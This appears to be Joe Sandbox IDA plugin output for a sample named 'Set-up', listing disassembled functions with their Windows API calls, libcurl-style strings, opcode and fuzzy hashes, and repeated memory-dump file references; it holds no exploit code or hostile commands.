Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1798382672-2691795271
Opcode ID: 948b51b32da2fb48d3ee2c829b1121607c543b0e5c349d409dec156b50278c73
Instruction ID: af24aeb3e6529b7255a47d2f53a5f97d53bf17779255820f133cf60ba8cb6618
Opcode Fuzzy Hash: 948b51b32da2fb48d3ee2c829b1121607c543b0e5c349d409dec156b50278c73
Instruction Fuzzy Hash: 9151BD74A04305ABE710DF24C881FAAB7A5FF88314F148569FD488B2D3E770E9A1CB91

Function 002977B0 Relevance: 10.6, APIs: 7, Instructions: 84fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00816A0D,00000000,00000000,?,?,?,00299882,?,00000000), ref: 002977DD
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 002977F0
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 00297802
GetLastError.KERNEL32(?,00000000), ref: 0029780E
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 00297830
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00297843
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0029786B

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: fseek$ErrorLastfclosefopenfreadftell
String ID:
API String ID: 1915723720-0
Opcode ID: 0bd38c4a6f8c7ea5ca1b7e6be5bc9a489447b26274ac98c70257bd0f0256348a
Instruction ID: 59cfa06371b15f897c677490fe6a57006a10ea603b7b39563437e4a091bc7a7c
Opcode Fuzzy Hash: 0bd38c4a6f8c7ea5ca1b7e6be5bc9a489447b26274ac98c70257bd0f0256348a
Instruction Fuzzy Hash: A211B4E2E2930267EF2169215C4EBBB3948FB913A5F180539FD05DA282F965DC24D1B2

Function 0020A150 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,00000080), ref: 0020A1C6
WSAGetLastError.WS2_32 ref: 0020A1D0

Part of subcall function 001ED090: GetLastError.KERNEL32 ref: 001ED0A1
Part of subcall function 001ED090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001ED0A9
Part of subcall function 001ED090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001ED0CD
Part of subcall function 001ED090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001ED0D7
Part of subcall function 001ED090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 001ED381
Part of subcall function 001ED090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 001ED3A2
Part of subcall function 001ED090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001ED3BF
Part of subcall function 001ED090: GetLastError.KERNEL32 ref: 001ED3C9
Part of subcall function 001ED090: SetLastError.KERNEL32(00000000), ref: 001ED3D4

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0020A21C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0020A220

Strings

ssloc inet_ntop() failed with errno %d: %s, xrefs: 0020A23B
getsockname() failed with errno %d: %s, xrefs: 0020A1F0

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 2076026050-2605427207
Opcode ID: 01f5b3f321ba0a7e0c95c8e0380f982f6081cf4532da0c8ac52aac148120b2ff
Instruction ID: 70e3812f4289b974bf8c95b6a29764a723b50e7e51d5e836fdf6320f343a3afb
Opcode Fuzzy Hash: 01f5b3f321ba0a7e0c95c8e0380f982f6081cf4532da0c8ac52aac148120b2ff
Instruction Fuzzy Hash: 5A21FB71818780ABF7219B28EC46FE673BCEF91324F040214FD8853192FB32699587E2

Function 001D7310 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,001D3BA6,?,00941044,001D1BD2), ref: 001D73A6
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,001D3BA6,?,00941044,001D1BD2), ref: 001D73CA
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,001D3BA6,?,00941044,001D1BD2), ref: 001D73D2

Strings

MEM %s:%d calloc(%zu,%zu) = %p, xrefs: 001D7376
calloc, xrefs: 001D7390, 001D73AF
LIMIT %s:%d %s reached memlimit, xrefs: 001D7397, 001D73B6

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
API String ID: 4185500129-1340350808
Opcode ID: 110ccce77846f38f2fbdd35d494be44fa2f46b82ec93df951c998925d85ac3c5
Instruction ID: 5eb4c617cd4590da0feb6232473d2a99677c2334348a13b405da7eb618b0258f
Opcode Fuzzy Hash: 110ccce77846f38f2fbdd35d494be44fa2f46b82ec93df951c998925d85ac3c5
Instruction Fuzzy Hash: 2521D1B5A083916BD3209F52DC46E177B98FB89754F490819FC4893392E361DC40E6B1

Function 001ED5E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42networklibraryloaderCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 001ED65A

Part of subcall function 001ED690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,001ED5FA,iphlpapi.dll), ref: 001ED699
Part of subcall function 001ED690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 001ED6B5
Part of subcall function 001ED690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,007F25F4,?,?,001ED5FA,iphlpapi.dll), ref: 001ED6C3

GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 001ED60C
QueryPerformanceFrequency.KERNEL32(00941070), ref: 001ED643
WSACleanup.WS2_32 ref: 001ED67C

Strings

iphlpapi.dll, xrefs: 001ED5F0
if_nametoindex, xrefs: 001ED606

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
String ID: if_nametoindex$iphlpapi.dll
API String ID: 3452087986-3097795196
Opcode ID: b6b2102a6577d5ef2ae103e05a9b90fce537cbaec8fbb844f71dad0b53659808
Instruction ID: 1fc407c996a80b67abf1def70613cfd77a60f4993ee5bf024e1775cd7a37ffe4
Opcode Fuzzy Hash: b6b2102a6577d5ef2ae103e05a9b90fce537cbaec8fbb844f71dad0b53659808
Instruction Fuzzy Hash: 0301F7A4A54BC04BE7116BB9BC1FB6937A06F56304F850568E848C62E3F738C5D8C262

Function 0067EF80 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,0067F06D), ref: 0067EF98
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,0067F06D), ref: 0067EFB4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,0067F06D), ref: 0067F01F

Strings

, xrefs: 0067EF85

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: calloc$free
String ID:
API String ID: 171065143-3916222277
Opcode ID: 3efad5ee525753a09dc8d140fc0b000599f1847fda9e5a5513f1e09d00c1846d
Instruction ID: d398f925a3b4237c1d5d4d837e2d9daaa46598a27f5719085bcb541976008972
Opcode Fuzzy Hash: 3efad5ee525753a09dc8d140fc0b000599f1847fda9e5a5513f1e09d00c1846d
Instruction Fuzzy Hash: E411A0B14047018FC720DF28D8A0A5ABBF1FF95314F158B2DD8A99B392E730D905CBA2

Function 002871C0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 002872FE

Strings

`\h, xrefs: 00287552, 002875EF

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _stricmp
String ID: `\h
API String ID: 2884411883-3807504640
Opcode ID: 23bdab7a1afec0f5d2c73d92b025c5352327aab48fd72271182fbd0f8017976f
Instruction ID: 80f22f350694f56ddc78926e6766f099148f368d938ef5cc45f3e44da37b2473
Opcode Fuzzy Hash: 23bdab7a1afec0f5d2c73d92b025c5352327aab48fd72271182fbd0f8017976f
Instruction Fuzzy Hash: ECC1C8B9929201AFEB10BF50EC85B2B77A9EF44304F140468FC4956293E771ED64CBA3

Function 001D1296 Relevance: 5.1, APIs: 4, Instructions: 80stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D12EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001D1323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D1344

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 2c831c88b3e4d643ff8804a4e9b602dfc47da52613fa7023fa779cabb1c83247
Instruction ID: 858e6848c0276e2c218b51d3d1d4f3a07dcc12dca00354c70daff290e83ddbee
Opcode Fuzzy Hash: 2c831c88b3e4d643ff8804a4e9b602dfc47da52613fa7023fa779cabb1c83247
Instruction Fuzzy Hash: 37316975A083559FCB10DF64D8847A9BBF1FB4A300F10892EC948A7311D735A885DF81

Function 001D13BB Relevance: 5.1, APIs: 4, Instructions: 66stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D12EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 001D1323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001D132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 001D1344

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 613748fdea15997484b758d0d02264bfc50d565d39cb5405e83300158b324856
Instruction ID: d78e65ffbcdba2bddd3033019c9da9f8488ac7566ff22ce7b68c073a11061253
Opcode Fuzzy Hash: 613748fdea15997484b758d0d02264bfc50d565d39cb5405e83300158b324856
Instruction Fuzzy Hash: A221F3B9E083159FCB14DF64D894AADBBF1FB89300F11892ED948A7310D735A985DF81

Function 00289270 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 0028A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0028A499
Part of subcall function 0028A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0028A4FB
Part of subcall function 0028A440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0028AA19

Part of subcall function 00289B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,002892A4,?,?,?,?,?,?,?,?,00000000), ref: 00289B6E
Part of subcall function 00289B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,00284860,00000000), ref: 00289C24

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 002893C3

Strings

X\h, xrefs: 00289394
`\h, xrefs: 002892C8, 00289377, 002893CB

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: AdaptersAddressesgetenv$Openmemcpy
String ID: X\h$`\h
API String ID: 1905038125-1840809173
Opcode ID: fcdc202b1125c82bc731ad1a0a3fce8101bcbbcae8baaa970c51fa7e65d71c53
Instruction ID: 395af372faeda37623146a2a5e7c6660d7e756d2ea304d002e15c2de67837c20
Opcode Fuzzy Hash: fcdc202b1125c82bc731ad1a0a3fce8101bcbbcae8baaa970c51fa7e65d71c53
Instruction Fuzzy Hash: CB51B075925302ABE710EF24E84573ABBE4BF94344F0C452CF84993691E731E9B4DB82

Function 001D3AB0 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(00941044,001D208F), ref: 001D3AB5
ReleaseSRWLockExclusive.KERNEL32(00941044,00941044,001D208F), ref: 001D3AD0
ReleaseSRWLockExclusive.KERNEL32(00941044), ref: 001D3B02

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire
String ID:
API String ID: 1021914862-0
Opcode ID: ce1d5b2c8d77fbe4a91d2527ce359bd2a67aa50538b2cfaffb478986aedbf86f
Instruction ID: 7dba8ad46263cdd10e2939e83a513b0df6f64094b90b0761ccf7679eb0af6640
Opcode Fuzzy Hash: ce1d5b2c8d77fbe4a91d2527ce359bd2a67aa50538b2cfaffb478986aedbf86f
Instruction Fuzzy Hash: 33E086386541864ED7307B61BCC7F3837657B91708B8404167504E1163EF7C44D85A2B

Function 001DF7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 167networkCOMMON

Download Yara Rule

APIs

WSACloseEvent.WS2_32(?), ref: 001DF9C4

Strings

multi.c, xrefs: 001DF9CA, 001DF9FD, 001DFA30

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: CloseEvent
String ID: multi.c
